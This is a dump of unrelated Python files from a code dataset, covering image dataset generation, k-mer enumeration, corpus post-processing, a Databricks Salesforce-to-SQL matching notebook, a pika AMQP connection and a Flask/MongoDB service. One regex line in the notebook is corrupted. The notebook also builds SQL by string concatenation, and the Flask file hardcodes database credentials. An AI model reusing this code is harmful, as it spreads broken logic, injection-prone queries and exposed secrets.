'test', spc)\n spc_fixedrandom_dir = os.path.join(args.out_dir, args.fixedrandom_dirname, spc)\n\n os.makedirs(spc_black_dir, exist_ok=True)\n os.makedirs(spc_random_dir, exist_ok=True)\n os.makedirs(spc_train_dir, exist_ok=True)\n os.makedirs(spc_test_dir, exist_ok=True)\n os.makedirs(spc_fixedrandom_dir, exist_ok=True)\n\n # Get fixed places for this species\n train_place = s2p_train[spc]\n test_place = s2p_test[spc]\n # Don't replace if we have enough images\n replace = len(spc_img) > len(places_dict_sub[train_place])\n train_place_imgs = np.random.choice(places_dict_sub[train_place], size=len(spc_img), replace=replace)\n test_place_imgs = np.random.choice(places_dict_sub[test_place], size=len(spc_img), replace=replace)\n\n # (image, segmentation, train place, test place\n it = zip(spc_img, spc_seg, train_place_imgs, test_place_imgs)\n\n for img_path, seg_path, train_place_path, test_place_path in tqdm(it, desc='Images', total=len(spc_img)):\n full_img_path = os.path.join(spc_img_dir, img_path)\n full_seg_path = os.path.join(spc_seg_dir, seg_path)\n\n # Load images\n img_np = np.asarray(Image.open(full_img_path).convert('RGB'))\n # Turn into opacity filter\n seg_np = np.asarray(Image.open(full_seg_path).convert('RGB')) / 255\n\n # Black background\n img_black_np = np.around(img_np * seg_np).astype(np.uint8)\n\n full_black_path = os.path.join(spc_black_dir, img_path)\n img_black = Image.fromarray(img_black_np)\n img_black.save(full_black_path)\n\n # Random background\n # Fixed/random background\n fixedrandom_place_path = all_sampled_places[all_places_i]\n random_place_path = all_places[all_places_i]\n all_places_i += 1\n if all_places_i >= len(all_sampled_places):\n # Reset counter, re-shuffle images\n all_places_i = 0\n np.random.shuffle(all_sampled_places)\n random_place = Image.open(random_place_path).convert('RGB')\n fixedrandom_place = Image.open(fixedrandom_place_path).convert('RGB')\n\n img_random = combine_and_mask(random_place, seg_np, img_black)\n full_random_path = os.path.join(spc_random_dir, img_path)\n img_random.save(full_random_path)\n\n # Fixed background\n train_place = Image.open(train_place_path).convert('RGB')\n test_place = Image.open(test_place_path).convert('RGB')\n\n img_train = combine_and_mask(train_place, seg_np, img_black)\n img_test = combine_and_mask(test_place, seg_np, img_black)\n\n full_train_path = os.path.join(spc_train_dir, img_path)\n img_train.save(full_train_path)\n full_test_path = os.path.join(spc_test_dir, img_path)\n img_test.save(full_test_path)\n\n img_fixedrandom = combine_and_mask(fixedrandom_place, seg_np, img_black)\n full_fixedrandom_path = os.path.join(spc_fixedrandom_dir, img_path)\n img_fixedrandom.save(full_fixedrandom_path)\n\n # Save fixed class/image metadata\n # TODO: Should probably record individual places images too\n fixed_dir = os.path.join(args.out_dir, args.fixed_dirname)\n with open(os.path.join(fixed_dir, 'train_places.json'), 'w') as f:\n json.dump(s2p_train, f, sort_keys=True, indent=4)\n with open(os.path.join(fixed_dir, 'test_places.json'), 'w') as f:\n json.dump(s2p_test, f, sort_keys=True, indent=4)\n","sub_path":"filelists/CUB/gen_cub_adversarial.py","file_name":"gen_cub_adversarial.py","file_ext":"py","file_size_in_byte":11963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"623645647","text":"def enumKMers(sequence, length, kmers = []):\n # Return kmers is length is <= 0 so as not not wrongly extend the length of\n # kmers further\n if length <= 0:\n return kmers\n\n # Enables the function to be called without initial empty list of kmers\n if kmers == []:\n\n # Set kmers == sequence and decrement length by 1\n return enumKMers(sequence, length - 1, sequence)\n\n # Takes care of base case where length == 1\n if length == 1:\n output = []\n for kmer in kmers:\n # Append the original kmer to output\n output.append(kmer)\n for seq in sequence:\n output.append(kmer + seq)\n return output\n\n # General case where length > 1\n else:\n output = []\n for kmer in kmers:\n # Append the original kmer to output\n output.append(kmer)\n for seq in sequence:\n output += enumKMers(sequence, length - 1, [kmer + seq])\n return output\n\nif __name__ == \"__main__\":\n\n # Read input file\n f = open(\"inputs/LEXV.in\", \"r\")\n\n # Read first line of input file, sequence\n sequence = f.readline().replace(\"\\n\",\"\").split(\" \")\n\n # Read second line of input file, length of kmer\n n = int(f.readline().replace(\"\\n\",\"\"))\n\n # Generate lexicographically sorted kmers\n kmers = enumKMers(sequence, n)\n\n # Output to file\n output = open(\"outputs/LEXV.out\", \"w\", newline=\"\\n\")\n for kmer in kmers:\n output.write(\"{}\\n\".format(kmer))\n","sub_path":"Bioinformatics_Stronghold/LEXV_Ordering_strings_of_different_lengths_lexicographically.py","file_name":"LEXV_Ordering_strings_of_different_lengths_lexicographically.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"445269607","text":"if False:\n from .configs import CorpusConfiguration\nimport tempfile\nimport regex as re\nfrom xml.etree.ElementTree import Element\nimport csv\nfrom typing import List, ClassVar, Tuple, Dict\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple\n\n\nclass PostProcessing(ABC):\n NodeName = \"XML-NODE-LOCAL-NAME\" # Name of the node to match\n\n @abstractmethod\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n raise NotImplementedError\n\n @abstractmethod\n def from_xml(cls, node: Element) -> ClassVar[\"PostProcessing\"]:\n raise NotImplementedError\n\n @classmethod\n def match_config_node(cls, node: Element) -> bool:\n \"\"\" If the current node is representing the current object, returns True\n \"\"\"\n return node.tag == cls.NodeName\n\n\nclass ApplyTo:\n def __init__(self, source: str, target: List[str]):\n self.source: str = source\n self.target: List[str] = target\n\n @staticmethod\n def from_xml(apply_to_node: Element) -> \"ApplyTo\":\n return ApplyTo(\n source=apply_to_node.attrib[\"source\"],\n target=[str(node.text).strip() for node in apply_to_node.findall(\"./target\")]\n )\n\n\nclass Disambiguation(PostProcessing):\n NodeName = \"disambiguation\"\n\n def __init__(self, lemma_key: str, disambiguation_key: str, match_pattern: str,\n default_value: str, glue: str, keep: bool = False):\n super(Disambiguation, self).__init__()\n self.lemma_key: str = lemma_key\n self.disambiguation_key: str = disambiguation_key\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.keep: bool = keep\n self.default_value: str = default_value\n self.glue: str = glue\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\") # 2\n\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line+[self.disambiguation_key])+\"\\n\")\n header = line\n continue\n elif not line:\n temp.write(\"\\n\")\n continue\n lines = dict(zip(header, line))\n\n found = self.match_pattern.findall(lines[self.lemma_key])\n if found:\n lines[self.disambiguation_key] = found[0]\n if not isinstance(found[0], str):\n lines[self.disambiguation_key] = self.glue.join(found[0])\n if not self.keep: # If we do not keep the original value, we remove it\n lines[self.lemma_key] = self.match_pattern.sub(\"\", lines[self.lemma_key])\n else:\n lines[self.disambiguation_key] = self.default_value\n temp.write(config.column_marker.join(list(lines.values()))+\"\\n\")\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"Disambiguation\":\n return cls(\n lemma_key=node.attrib[\"source\"],\n disambiguation_key=node.attrib[\"new-column\"],\n match_pattern=node.attrib[\"matchPattern\"],\n keep=\"keep\" in node.attrib,\n default_value=node.attrib.get(\"default\", \"_\"),\n glue=node.attrib.get(\"join\", \"|\")\n )\n\n\nclass ReplacementSet(PostProcessing):\n \"\"\" Using a regular expression, replaces values in certain columns\n \"\"\"\n NodeName = \"replacement\"\n\n def __init__(\n self, match_pattern: str, replacement_pattern: str,\n applies_to: List[ApplyTo]\n ):\n super(ReplacementSet, self).__init__()\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.replacement_pattern: str = replacement_pattern\n self.applies_to: List[ApplyTo] = applies_to\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\")\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line)+\"\\n\")\n header = line\n continue\n elif not line:\n temp.write(\"\\n\")\n continue\n lines = dict(zip(header, line))\n\n for apply_to in self.applies_to:\n if self.match_pattern.search(lines[apply_to.source]):\n for target in apply_to.target:\n # If source and target are the same, we simply replace source by target\n if apply_to.source == target:\n lines[apply_to.source] = self.match_pattern.sub(\n self.replacement_pattern,\n lines[apply_to.source]\n )\n else: # Otherwise, we just set the target value using this value\n lines[target] = self.replacement_pattern\n\n temp.write(config.column_marker.join(list(lines.values()))+\"\\n\")\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"ReplacementSet\":\n return ReplacementSet(\n match_pattern=node.attrib[\"matchPattern\"],\n replacement_pattern=node.attrib[\"replacementPattern\"],\n applies_to=[ApplyTo.from_xml(apply_to) for apply_to in node.findall(\"applyTo\")]\n )\n\n\nclass Skip(PostProcessing):\n \"\"\" If the matchPattern matches target column, the line is removed from the post-processed output\n \"\"\"\n NodeName = \"skip\"\n\n def __init__(\n self, match_pattern: str, source: str\n ):\n super(Skip, self).__init__()\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.source: str = source\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\") # 2\n\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line)+\"\\n\")\n header = line\n continue\n elif not line:\n temp.write(\"\\n\")\n continue\n\n lines = dict(zip(header, line))\n\n # If it matches, we skip it\n if self.match_pattern.search(lines[self.source]):\n continue\n\n temp.write(config.column_marker.join(list(lines.values()))+\"\\n\")\n\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"Skip\":\n return Skip(\n match_pattern=node.attrib[\"matchPattern\"],\n source=node.attrib[\"source\"]\n )\n\n\nclass Clitic(PostProcessing):\n \"\"\" If the matchPattern matches target column, the line is removed from the post-processed output\n \"\"\"\n NodeName = \"clitic\"\n\n Transfer = namedtuple(\"Transfer\", [\"col\", \"glue\"])\n\n def __init__(\n self, match_pattern: str, source: str, glue: str, transfers: List[Tuple[str, bool]]\n ):\n super(Clitic, self).__init__()\n self.match_pattern: re.Regex = re.compile(match_pattern)\n self.source: str = source\n self.glue = glue\n _tr = {False: \"\", True: self.glue}\n self.transfers: List[Clitic.Transfer] = [\n Clitic.Transfer(key, _tr[has_glue])\n for key, has_glue in transfers\n if not print(key, has_glue)\n ]\n\n def apply(self, file_path: str, config: \"CorpusConfiguration\"):\n temp = tempfile.TemporaryFile(mode=\"w+\") # 2\n default = (\"\", \"\")\n try:\n with open(file_path) as file:\n csv_reader = csv.reader(file, delimiter=config.column_marker)\n header: List[str] = []\n sequence = []\n # [Int = Line to apply modifications to, Dict[Column name, Tuple[Glue, Value]]]\n modifications: List[Tuple[int, Dict[str, Tuple[str, str]]]] = []\n for nb_line, line in enumerate(csv_reader): # The file should already have been open\n if nb_line == 0:\n temp.write(config.column_marker.join(line)+\"\\n\")\n header = line\n continue\n elif not line:\n for target_line, modif in modifications:\n sequence[target_line] = {\n column: modif.get(column, default)[0].join(\n [value, modif.get(column, default)[1]]\n )\n for column, value in sequence[target_line].items()\n }\n temp.write(\"\\n\".join([\n config.column_marker.join(list(l.values()))\n for l in sequence\n ])+\"\\n\")\n sequence = []\n modifications = []\n continue\n\n lines = dict(zip(header, line))\n\n # If it matches, we give it to the previous / original line\n if self.match_pattern.match(lines[self.source]):\n modifications.append(\n (\n len(sequence) - 1 -len(modifications),\n {key: (keep, lines[key]) for (key, keep) in self.transfers}\n )\n )\n continue\n\n # config.column_marker.join(list(lines.values()))\n sequence.append(lines)\n\n with open(file_path, \"w\") as f:\n temp.seek(0)\n f.write(temp.read())\n finally:\n temp.close() # 5\n\n @classmethod\n def from_xml(cls, node: Element) -> \"Clitic\":\n return cls(\n match_pattern=node.attrib[\"matchPattern\"],\n source=node.attrib[\"source\"],\n glue=node.attrib[\"glue_char\"],\n transfers=[\n (\n tr.text,\n tr.attrib.get(\"no-glue-char\", \"false\").lower() == \"false\"\n )\n for tr in node.findall(\"transfer\")\n ]\n )\n","sub_path":"protogenie/postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":11663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"167703568","text":"# Databricks notebook source\n# Databricks notebook source\nc_value=dbutils.widgets.get(\"to_be_checked\")\nhistory_flag=dbutils.widgets.get(\"history_flag\")\n\n# COMMAND ----------\n\n# Databricks notebook source\ndef SQL_connection(server,database,username,password):\n import pyodbc\n import configparser\n import traceback\n\n config = configparser.ConfigParser()\n #This configuration path should be configured in Blob storage\n config.read(\"/dbfs/mnt/momentive-configuration/config-file.ini\")\n\n server = config.get('sql_db', server)\n database = config.get('sql_db', database)\n username = config.get('sql_db', username)\n password = config.get('sql_db', password)\n \n\n driver= \"{ODBC Driver 17 for SQL Server}\"\n connection_string = 'DRIVER=' + driver + \\\n ';SERVER=' + server + \\\n ';PORT=1433' + \\\n ';DATABASE=' + database + \\\n ';UID=' + username + \\\n ';PWD=' + password\n\n try:\n sql_conn = pyodbc.connect(connection_string)\n return sql_conn\n # execute query and save data in pandas df\n except Exception as error:\n print(\" \\u2717 error message: {}\".format(error))\n # I found that traceback prints much more detailed error message\n traceback.print_exc()\n\n\n# COMMAND ----------\n\ndef adding_matched_values(temp_df,category_type,indx,value,subct):\n try:\n indx=int(indx)\n matched_category=''\n matched_column=''\n if category_type == \"MATNBR\":\n if indx==0:\n matched_category=\"MATERIAL NUMBER\"\n matched_column=\"Text1\" \n elif indx==1:\n matched_category=\"REAL-SPECID\"\n matched_column=\"Text2\" \n else:\n matched_category=\"BDT\"\n matched_column=\"Text3\"\n\n elif category_type == \"NAMPROD\":\n if indx==0:\n matched_category=\"NAMPROD\"\n matched_column=\"Text1\" \n elif indx==1 and subct==\"REAL_SUB\":\n matched_category=\"REAL-SPECID\"\n matched_column=\"Text2\" \n elif indx==1 and subct==\"PURE_SUB\":\n matched_category=\"PURE-SPECID\"\n matched_column=\"Text2\" \n else:\n matched_category=\"SYNONYMS\"\n matched_column=\"Text3\"\n elif category_type == \"NUMCAS\":\n if indx==0:\n matched_category=\"NUMCAS\"\n matched_column=\"Text1\" \n elif indx==1 and subct==\"REAL_SUB\":\n matched_category=\"REAL-SPECID\"\n matched_column=\"Text2\" \n elif indx==1 and subct==\"PURE_SUB\":\n matched_category=\"PURE-SPECID\"\n matched_column=\"Text2\" \n else:\n matched_category=\"CHEMICAL NAME\"\n matched_column=\"Text3\"\n# print(\"matched_category\",matched_category)\n# print(\"matched_column\",matched_column)\n temp_df[\"MatchedColumn\"]=matched_column\n temp_df[\"MatchedCategory\"]=matched_category\n temp_df[\"MatchedValue\"]=value\n return temp_df\n except Exception as e:\n print(\"error in adding matched_values\",e)\n\n# COMMAND ----------\n\nimport multiprocessing as mp\nfrom multiprocessing.pool import ThreadPool\nimport datetime\nimport os\nimport re\nimport pandas as pd\nimport configparser\nimport datetime\n\ncurrent_date = str(datetime.datetime.now())\ndate = current_date[:10]\nconfig = configparser.ConfigParser()\n#This configuration path should be configured in Blob storage\nconfig.read(\"/dbfs/mnt/momentive-configuration/config-file.ini\")\nhistory_filename = config.get('mnt_sales_force','mnt_sales_force_historical_filename')\nincremental_filename = config.get('mnt_sales_force','mnt_sales_force_incremental_filename')\nif history_flag =='false':\n filename=incremental_filename\nelse:\n filename=history_filename\nsfdc_text_folder = config.get('mnt_sales_force','mnt_sales_force_split_files')\nsfdc_extract_column = config.get('mnt_sales_force',\"mnt_sales_force_extract_column\")\nsfdc_column = sfdc_extract_column.split(\",\")\n# inscope_sfdc_info_df=pd.read_csv('/dbfs/mnt/momentive-sources-pih/sales-force/backup/test.csv',encoding=\"ISO-8859-1\")\ninscope_sfdc_info_df=pd.read_csv(sfdc_text_folder+filename+\".csv\",encoding=\"ISO-8859-1\")\nprint(\"processing file length - \",len(inscope_sfdc_info_df))\n#Connecting SQL db to get SFDC data\nsql_cursor = SQL_connection(\"server\",\"database\",\"username\",\"password\")\ncursor=sql_cursor.cursor()\nadding_custom_column=['MatchedColumn','MatchedCategory','MatchedValue']\ncvalue=c_value.split(\",\")\noutput_str = \"|\".join(cvalue)\noutput_str=str(output_str[:-2])\nprint(\"row --> \",cvalue)\noutput_df=pd.DataFrame()\ncustom_validate=[\"validate_category\"]\nstatus=''\n\ndef concurrent_function(cvalue):\n try:\n global output_df\n validate=\"validate_category\" \n item=cvalue[1]\n category_type=cvalue[0]\n subct=cvalue[2]\n indx=cvalue[3]\n org_value=str(item) \n value=org_value.strip().lower()\n if value.isdigit() and len(value)>0 : \n value=int(value)\n rgx = re.compile(r'((?1: \n digit_match_row=adding_matched_values(re_match,category_type,indx,org_value,subct)\n output_df=pd.concat([output_df,digit_match_row])\n elif len(value)>0 and (\"?\" not in value and \"!\" not in value):\n value=value.replace(\"silopren*\",'')\n e_value=value.replace(\"*\",'')\n e_value=e_value.replace(\"®\",'')\n whole_match=pd.DataFrame()\n w_rgx = re.compile(r\"(([^a-zA-Z]|^){}([^a-zA-Z]|$))\".format(e_value),re.I)\n whole_match=inscope_sfdc_info_df[inscope_sfdc_info_df[validate].str.contains(w_rgx,na=False)] \n if len(whole_match)>0:\n string_match_column=adding_matched_values(whole_match,category_type,indx,org_value,subct)\n output_df=pd.concat([output_df,string_match_column])\n except Exception as e:\n print(\"value error\",e)\n\ntry:\n concurrent_function(cvalue)\n # inserting into sfdc indentified table\n if len(output_df)>0:\n output_df.drop_duplicates(inplace=True)\n output_df=output_df[(sfdc_column+adding_custom_column)]\n output_df=output_df.fillna(\"NULL\")\n output_df=output_df.replace({\"None\":\"NULL\"})\n cursor=sql_cursor.cursor()\n output_list = output_df.values.tolist()\n for row in output_list:\n try: \n insert_data=''\n for item in row:\n item=str(item)\n if \"'\" in item:\n item=item.replace(\"'\",\"''\")\n insert_data+=\"'\"+item+\"',\"\n if len(insert_data)>0:\n insert_data=insert_data[:-1]\n insert_query=\"insert into [momentive].[sfdc_identified_case] values (\"+insert_data+\")\"\n cursor.execute(insert_query)\n sql_cursor.commit()\n status=output_str+\" --> \"+str(len(output_list))+\" case detail(s) found\"\n except Exception as e:\n status=output_str+\" --> Oops error found while inserting\"+str(e)\n dbutils.notebook.exit(status) \n else:\n status=output_str+\" --> 0 case detail found\"\n \nexcept Exception as e:\n status=output_str+\" --> Oops error found in processing\"+str(e)\n dbutils.notebook.exit(status)\n \ndbutils.notebook.exit(status)\n","sub_path":"notebooks/Users/admomanickamm@momentive.onmicrosoft.com/sfdc_parallel.py","file_name":"sfdc_parallel.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"114488348","text":"\"\"\"Thread connection\"\"\"\nimport logging\nimport socket\nimport threading\n\nimport time\n\nimport pika\nfrom pika import frame, exceptions\nfrom pika.adapters.thread_channel import ThreadConnectionChannel\nfrom pika.adapters.thread_connection_io import ThreadConnectionIO\nfrom pika.adapters.transport import Transport\nimport pika.spec as spec\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass CloseableThread(threading.Thread):\n def __init__(self, name):\n super(CloseableThread, self).__init__(name=name)\n self._stop = threading.Event()\n self.daemon = True\n\n def stop(self):\n self._stop.set()\n\n def run(self):\n while not self._stop.isSet():\n try:\n self._run0()\n except Exception as e:\n LOGGER.error(e)\n\n def _run0(self):\n raise NotImplementedError\n\n\nclass HeartbeatSender(CloseableThread):\n def __init__(self, connection):\n super(HeartbeatSender, self).__init__(\"HeartbeatThread\")\n self._connection = connection\n self.last_activity_time = 0\n self.heartbeat = 0\n\n def _run0(self):\n self._send_heartbeat_frame()\n\n def signal_activity(self):\n self.last_activity_time = int(round(time.time()))\n\n def _send_heartbeat_frame(self):\n now = int(round(time.time()))\n if now > (self.last_activity_time + self.heartbeat):\n LOGGER.debug(\"Sending heartbeat frame\")\n self._connection.send_frame(frame.Heartbeat())\n\n def setHeartbeat(self, heartbeat):\n self.heartbeat = heartbeat\n\n\nclass ThreadConnectionMainLoop(CloseableThread):\n def __init__(self, connection):\n super(ThreadConnectionMainLoop, self).__init__(\"MainLoop\")\n self._connection = connection\n\n def _run0(self):\n (_frame_type, _channel, _payload, read_frame_buffer) = self._connection.read_frame()\n _consumed_count, frame_value = frame.decode_frame(read_frame_buffer)\n if isinstance(frame_value, frame.Heartbeat):\n LOGGER.debug(\"receive heartbeat\")\n elif isinstance(frame_value, frame.Method) and (isinstance(frame_value.method, spec.Basic.Ack) or\n isinstance(frame_value.method, spec.Basic.Ack)):\n # for In publisher-acknowledgments mode\n self._connection.deliver_pub_ack(frame_value)\n else:\n self._connection.deliver_frame(frame_value)\n\n\nclass ThreadConnection(ThreadConnectionIO):\n def __init__(self, parameters=None):\n super(ThreadConnection, self).__init__(self)\n self.parameters = parameters\n self.server_properties = None\n self.client_properties = {\n 'product': pika.connection.PRODUCT,\n 'platform': 'Python %s' % pika.connection.platform.python_version(),\n 'capabilities': {\n 'authentication_failure_close': True,\n 'basic.nack': True,\n 'connection.blocked': True,\n 'consumer_cancel_notify': True,\n 'publisher_confirms': True\n },\n 'information': 'See http://pika.rtfd.org',\n 'version': pika.connection.__version__\n }\n if parameters.client_properties:\n self.client_properties.update(parameters.client_properties)\n\n self.channels = dict()\n self.channel_number0 = 0\n\n self._transport = Transport(parameters.host, parameters.port, parameters.socket_timeout,\n parameters.ssl,\n sslopts=parameters.ssl_options)\n self._try_connect()\n self._heartbeat = HeartbeatSender(self)\n # hanshake\n self._main_loop = ThreadConnectionMainLoop(self)\n self._main_loop.start()\n self._handshake()\n\n # start heartbeat\n self._heartbeat.setHeartbeat(self.heartbeat)\n self._heartbeat.start()\n\n def _handshake(self):\n connection_start = self.rpc0(self.channel_number0, frame.ProtocolHeader(), [spec.Connection.Start])\n self.server_properties = connection_start.server_properties\n self.publisher_confirms = self.server_properties['capabilities']['publisher_confirms']\n self.basic_nack = self.server_properties['capabilities']['basic.nack']\n (auth_type, response) = self.parameters.credentials.response_for(connection_start)\n tune = self.rpc0(self.channel_number0, spec.Connection.StartOk(self.client_properties, auth_type, response,\n self.parameters.locale), [spec.Connection.Tune])\n self.channel_max = tune.channel_max or self.parameters.channel_max\n self.frame_max = tune.frame_max or self.parameters.frame_max\n self.heartbeat = min(tune.heartbeat, self.parameters.heartbeat)\n\n self.send_method(self.channel_number0, spec.Connection.TuneOk(self.channel_max, self.frame_max,\n self.heartbeat))\n self.rpc0(self.channel_number0, spec.Connection.Open(self.parameters.virtual_host, '', False),\n [spec.Connection.OpenOk])\n\n def channel(self, channel_number=None):\n if channel_number is None:\n channel_number = self._next_channel_number()\n self.channels[channel_number] = ThreadConnectionChannel(self, channel_number)\n self.channels[channel_number].open()\n return self.channels[channel_number]\n\n def deliver_pub_ack(self, frame_value):\n if frame_value.channel_number not in self.channels:\n LOGGER.critical(\"Received %s frame for unregistered channel %i on %s\", frame_value.NAME,\n frame_value.channel_number, self)\n return\n self.channels[frame_value.channel_number].handle_pub_ack(frame_value)\n\n def deliver_frame(self, frame_value):\n if frame_value.channel_number == 0:\n self.handle_frame(frame_value)\n return\n if frame_value.channel_number not in self.channels:\n LOGGER.critical(\"Received %s frame for unregistered channel %i on %s\", frame_value.NAME,\n frame_value.channel_number, self)\n return\n self.channels[frame_value.channel_number].handle_frame(frame_value)\n\n def read_frame(self):\n if self.is_closed():\n LOGGER.error(\"Attempted to read frame when closed\")\n return self._transport.read_frame()\n\n def send_method(self, channel_number, method):\n if isinstance(method, frame.ProtocolHeader):\n self.send_frame(method)\n else:\n self.send_frame(frame.Method(channel_number, method))\n\n def send_frame(self, frame_value):\n if self.is_closed():\n LOGGER.error(\"Attempted to send frame when closed\")\n raise exceptions.ConnectionClosed\n\n marshaled_frame = frame_value.marshal()\n self._transport.write(marshaled_frame)\n self._heartbeat.signal_activity()\n\n def is_closed(self):\n return not self._transport.connected\n\n def _try_connect(self):\n remaining_connection_attempts = self.parameters.connection_attempts\n while True:\n try:\n self._transport.connect()\n return\n except socket.error:\n if remaining_connection_attempts <= 0:\n raise\n else:\n LOGGER.info(\"Retrying in %i seconds\", self.parameters.retry_delay)\n remaining_connection_attempts -= 1\n\n def _next_channel_number(self):\n if len(self.channels) >= self.channel_max:\n raise exceptions.NoFreeChannels()\n\n for num in xrange(1, len(self.channels) + 1):\n if num not in self.channels:\n return num\n return len(self.channels) + 1\n","sub_path":"pika/adapters/thread_connection.py","file_name":"thread_connection.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"568931556","text":"import numpy as np\r\nimport cv2\r\ncap = cv2.VideoCapture(0)\r\n \r\n# Define the codec and create VideoWriter object\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter('output.avi',fourcc, 20.0, (640,480))\r\ncount=0 \r\nwhile(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret==True:\r\n#to capture frame after fliping to 90 deg\r\n frame = cv2.flip(frame,0)\r\n#to capture current frame after it satisfies the condition\r\n cv2.imwrite(\"frame%d.jpg\" % count, frame) # save frame as JPEG file\r\n# write the flipped frame\r\n out.write(frame)\r\n \r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n else:\r\n break\r\n \r\n# Release everything if job is finished\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"VideoFlipVertical.py","file_name":"VideoFlipVertical.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"197009036","text":"import numpy as np \nimport matplotlib.pyplot as plt\n'''\nmat1 = np.zeros((3,4,5))\nprint(mat1)\nprint(mat1.ndim)\nprint(mat1.shape)\nprint()\n\nmat2 = np.ones((3,3)) *2\n'''\n'''\nmat2_2 = mat2*2\nmat2_3 = mat2 * mat2_2 #和線性代數的矩陣乘法不同\nmat2_4 = np.matmul(mat2,mat2_2) #線代矩陣乘法\n\nprint(mat2)\nprint(mat2_2)\nprint(mat2_3)\nprint(mat2_4)\nprint()\n'''\n'''\nmat3 = np.eye(3,3)\nprint(mat2)\nprint(mat3)\nprint(mat2*mat3)\nprint(np.matmul(mat2,mat3))\nprint()\n'''\narr_x = np.arange(10)\na = np.random.rand(10) # uniform in [0, 1]\nb = np.random.randint(0, 10, 10) # uniform in [0, 10) with 10 elements\nprint(a)\nprint(b)\nplt.plot(arr_x,a,'-r^',arr_x,b,'--go')\nplt.show()\n","sub_path":"13_numpy/numpy_generais.py","file_name":"numpy_generais.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"635462954","text":"import logging\nimport os\nimport re\nimport socket\nimport sqlite3\nimport threading\nfrom BaseHTTPServer import HTTPServer\n\nimport requests\nfrom flask import request, Flask, g, jsonify\nfrom prometheus_client import Counter, MetricsHandler\nfrom pymongo import MongoClient\nfrom requests import ConnectionError, exceptions\n\nimport Download\n\napp = Flask(__name__)\n\n# MONGO_HOST = \"localhost\"\n# MONGO_PORT = 27017\nMONGO_HOST = \"10.85.186.177\"\nMONGO_PORT = 27101\nMONGO_DBNAME = \"counter\"\nMONGO_USER = \"rw_art\"\nMONGO_PASS = \"mxjG3E_q\"\n\nclient = MongoClient(MONGO_HOST, MONGO_PORT)\n# client = MongoClient(\"mongodb://\"+MONGO_HOST+\":27101\")\ndb = client['counter']\n\n# app.config.from_pyfile('config.py', silent=False)\n\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'relayer.db'),\n PROMETHEUS_PORT=8000\n))\n\nrelay_mapping = {}\n# logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\ntotal = Counter('total', 'total requests')\nsuccess_counter = Counter('Success', 'requests successful')\n\n\nclass PrometheusEndpointServer(threading.Thread):\n \"\"\"A thread class that holds an http and makes it serve_forever().\"\"\"\n\n def __init__(self, httpd, *args, **kwargs):\n self.httpd = httpd\n super(PrometheusEndpointServer, self).__init__(*args, **kwargs)\n\n def run(self):\n self.httpd.serve_forever()\n\n\ndef start_prometheus_server():\n try:\n httpd = HTTPServer((\"0.0.0.0\", app.config['PROMETHEUS_PORT']), MetricsHandler)\n logging.info(\"prometheus started\")\n except (OSError, socket.error):\n return\n\n thread = PrometheusEndpointServer(httpd)\n thread.daemon = True\n thread.start()\n\n\nstart_prometheus_server()\n\n\ndef connect_db():\n conn = sqlite3.connect(app.config['DATABASE'])\n conn.row_factory = sqlite3.Row\n return conn;\n\n\ndef init_db():\n db = get_db()\n with app.open_resource('schema.sql', 'r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\n@app.cli.command('initdb')\ndef init_db_command():\n init_db()\n logging.info(\"DB initialized\")\n\n\n@app.context_processor\ndef app_start():\n init_db()\n app.logger.info(\"DB started\")\n\n\n@app.teardown_appcontext\ndef 